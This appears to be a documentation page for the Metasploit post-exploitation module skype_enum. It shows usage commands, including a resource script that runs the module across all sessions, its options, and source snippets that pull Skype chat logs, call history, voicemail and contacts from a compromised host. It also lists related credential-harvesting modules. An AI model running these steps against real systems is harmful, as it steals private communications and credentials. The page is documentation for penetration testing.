Multi Gather Skype User Data Enumeration - Metasploit
This page contains detailed information about how to use the post/multi/gather/skype_enum metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Multi Gather Skype User Data Enumeration
Module: post/multi/gather/skype_enum
Source code: modules/post/multi/gather/skype_enum.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): OSX, Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will enumerate Skype account settings, contact list, call history, chat logs, file transfer history, and voicemail logs, saving all the data to CSV files for analysis.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/multi/gather/skype_enum
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/multi/gather/skype_enum
msf post(skype_enum) > show options
... show and set options ...
msf post(skype_enum) > set SESSION session-id
msf post(skype_enum) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/multi/gather/skype_enum")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Go back to menu.
Msfconsole Usage
Here is how the multi/gather/skype_enum post exploitation module looks in the msfconsole:
msf6 > use post/multi/gather/skype_enum
msf6 post(multi/gather/skype_enum) > show info
Name: Multi Gather Skype User Data Enumeration
Module: post/multi/gather/skype_enum
Platform: OSX, Windows
Arch:
Rank: Normal
Provided by:
Carlos Perez <[email protected]>
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Description:
This module will enumerate Skype account settings, contact list,
call history, chat logs, file transfer history, and voicemail logs,
saving all the data to CSV files for analysis.
Module Options
This is a complete list of options available in the multi/gather/skype_enum post exploitation module:
msf6 post(multi/gather/skype_enum) > show options
Module options (post/multi/gather/skype_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Advanced Options
Here is a complete list of advanced options supported by the multi/gather/skype_enum post exploitation module:
msf6 post(multi/gather/skype_enum) > show advanced
Module advanced options (post/multi/gather/skype_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
TIMEOUT 90 yes Timeout in seconds when downloading main.db on a shell session.
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the multi/gather/skype_enum module can do:
msf6 post(multi/gather/skype_enum) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the multi/gather/skype_enum post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(multi/gather/skype_enum) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Running Skype enumeration against <COMPUTER>
- Failed to load sqlite3, try 'gem install sqlite3'
- This session type and platform are not supported.
- This session type and platform are not supported.
- Skype is not installed for <USER>
- Could not download the file. Set the TIMEOUT option to a higher number.
- No skype accounts are configured for <USER>
- No chat logs where found!
- No file transfer history was found!
- No voicemail history was found!
- No call log was found!
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Running Skype enumeration against <COMPUTER>
Here is a relevant code snippet related to the "Running Skype enumeration against <COMPUTER>" error message:
34: end
35:
36: # Run Method for when run command is issued
37: def run
38: # syinfo is only on meterpreter sessions
39: print_status("Running Skype enumeration against #{sysinfo['Computer']}") if not sysinfo.nil?
40:
41: # Ensure that SQLite3 gem is installed
42: begin
43: require 'sqlite3'
44: rescue LoadError
Failed to load sqlite3, try 'gem install sqlite3'
Here is a relevant code snippet related to the "Failed to load sqlite3, try 'gem install sqlite3'" error message:
40:
41: # Ensure that SQLite3 gem is installed
42: begin
43: require 'sqlite3'
44: rescue LoadError
45: print_error("Failed to load sqlite3, try 'gem install sqlite3'")
46: return
47: end
48:
49: if session.platform =~ /java/
50: # Make sure that Java Meterpreter on anything but OSX will exit
This session type and platform are not supported.
Here is a relevant code snippet related to the "This session type and platform are not supported." error message:
47: end
48:
49: if session.platform =~ /java/
50: # Make sure that Java Meterpreter on anything but OSX will exit
51: if session.platform !~ /osx/
52: print_error("This session type and platform are not supported.")
53: return
54: end
55: # Iterate thru each user profile on as OSX System for users not in the default install
56: users = get_users.collect { |p| if p['uid'].to_i > 500; p; end }.compact
57: users.each do |p|
This session type and platform are not supported.
Here is a relevant code snippet related to the "This session type and platform are not supported." error message:
70: db_in_loot = download_db(p)
71: process_db(db_in_loot, p['UserName'])
72: end
73: end
74: else
75: print_error("This session type and platform are not supported.")
76: end
77: end
78:
79: # Check if Skype is installed. Returns true or false.
80: def check_skype(path, user)
Skype is not installed for <USER>
Here is a relevant code snippet related to the "Skype is not installed for <USER>" error message:
90: if dir =~ /Skype/
91: print_good("Skype account found for #{user}")
92: return true
93: end
94: end
95: print_error("Skype is not installed for #{user}")
96: return false
97: end
98:
99: # Download file using Meterpreter functionality and returns path in loot for the file
100: def download_db(profile)
Could not download the file. Set the TIMEOUT option to a higher number.
Here is a relevant code snippet related to the "Could not download the file. Set the TIMEOUT option to a higher number." error message:
122: else
123: print_status("Downloading #{db}")
124: # Giving it 1:30 minutes to download since the file could be several MB
125: maindb = cmd_exec("cat", "\"#{db}\"", datastore['TIMEOUT'])
126: if maindb.nil?
127: print_error("Could not download the file. Set the TIMEOUT option to a higher number.")
128: return
129: end
130: # Saving the content as binary so it can be used
131: output = ::File.open(file_loc, "wb")
132: maindb.each_line do |d|
No skype accounts are configured for <USER>
Here is a relevant code snippet related to the "No skype accounts are configured for <USER>" error message:
179: "skype_accounts.csv",
180: "Skype User #{user} Account information from configuration database.")
181: print_good("Saving account information to #{user_info}")
182: save_csv(user_rows, user_info)
183: else
184: print_error("No skype accounts are configured for #{user}")
185: return
186: end
187:
188: # Extract chat log from the database
189: print_status("Extracting chat message log")
No chat logs where found!
Here is a relevant code snippet related to the "No chat logs where found!" error message:
199:
200: if cl_rows.length > 1
201: print_good("Saving chat log to #{chat_log}")
202: save_csv(cl_rows, chat_log)
203: else
204: print_error("No chat logs where found!")
205: end
206:
207: # Extract file transfer history
208: print_status("Extracting file transfer history")
209: ft_rows = db.execute2('SELECT "partner_handle", "partner_dispname",
No file transfer history was found!
Here is a relevant code snippet related to the "No file transfer history was found!" error message:
220: # Check that we have actual file transfers to report
221: if ft_rows.length > 1
222: print_good("Saving file transfer history to #{file_transfer}")
223: save_csv(ft_rows, file_transfer)
224: else
225: print_error("No file transfer history was found!")
226: end
227:
228: # Extract voicemail history
229: print_status("Extracting voicemail history")
230: vm_rows = db.execute2('SELECT "type", "partner_handle", "partner_dispname", "status",
No voicemail history was found!
Here is a relevant code snippet related to the "No voicemail history was found!" error message:
241:
242: if vm_rows.length > 1
243: print_good("Saving voicemail history to #{voicemail}")
244: save_csv(vm_rows, voicemail)
245: else
246: print_error("No voicemail history was found!")
247: end
248:
249: # Extracting call log
250: print_status("Extracting call log")
251: call_rows = db.execute2('SELECT datetime("begin_timestamp","unixepoch"),
No call log was found!
Here is a relevant code snippet related to the "No call log was found!" error message:
262: "Skype User #{user} call history.")
263: if call_rows.length > 1
264: print_good("Saving call log to #{call_log}")
265: save_csv(call_rows, call_log)
266: else
267: print_error("No call log was found!")
268: end
269:
270: # Extracting contact list
271: print_status("Extracting contact list")
272: ct_rows = db.execute2('SELECT "skypename", "pstnnumber", "aliases", "fullname",
Go back to menu.
Related Pull Requests
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7507 Merged Pull Request: Refactor arch/platform, refactor TLV XOR, add UUID to each packet, fix payload uuid/arch/platform tracking, and update everything to match
- #6687 Merged Pull Request: Fix meterpreter platform to include OS in the tuple for all meterpreters
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #2525 Merged Pull Request: Change module boilerplate
- #2417 Merged Pull Request: Prefer Ruby style for single word collections
- #2304 Merged Pull Request: Fix load order in posts, hopefully forever
- #1329 Merged Pull Request: Fixed a typo in the skype_enum module
- #1241 Merged Pull Request: Removed all $Id$ and $Revision$ occurences
- #958 Merged Pull Request: Msftidy 2
- #454 Merged Pull Request: Skype enum
Go back to menu.
See Also
Check also the following modules related to this module:
- post/multi/gather/apple_ios_backup
- post/multi/gather/aws_ec2_instance_metadata
- post/multi/gather/aws_keys
- post/multi/gather/check_malware
- post/multi/gather/chrome_cookies
- post/multi/gather/dbvis_enum
- post/multi/gather/dns_bruteforce
- post/multi/gather/dns_reverse_lookup
- post/multi/gather/dns_srv_lookup
- post/multi/gather/docker_creds
- post/multi/gather/enum_hexchat
- post/multi/gather/enum_software_versions
- post/multi/gather/enum_vbox
- post/multi/gather/env
- post/multi/gather/fetchmailrc_creds
- post/multi/gather/filezilla_client_cred
- post/multi/gather/find_vmx
- post/multi/gather/firefox_creds
- post/multi/gather/gpg_creds
- post/multi/gather/grub_creds
- post/multi/gather/irssi_creds
- post/multi/gather/jboss_gather
- post/multi/gather/jenkins_gather
- post/multi/gather/lastpass_creds
- post/multi/gather/maven_creds
- post/multi/gather/multi_command
- post/multi/gather/netrc_creds
- post/multi/gather/pgpass_creds
- post/multi/gather/pidgin_cred
- post/multi/gather/ping_sweep
- post/multi/gather/remmina_creds
- post/multi/gather/resolve_hosts
- post/multi/gather/rsyncd_creds
- post/multi/gather/rubygems_api_key
- post/multi/gather/run_console_rc_file
- post/multi/gather/saltstack_salt
- post/multi/gather/ssh_creds
- post/multi/gather/thunderbird_creds
- post/multi/gather/tomcat_gather
- post/multi/gather/ubiquiti_unifi_backup
- post/multi/gather/unix_cached_ad_hashes
- post/multi/gather/unix_kerberos_tickets
- post/multi/gather/wlan_geolocate
Authors
- Carlos Perez <carlos_perez[at]darkoperator.com>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.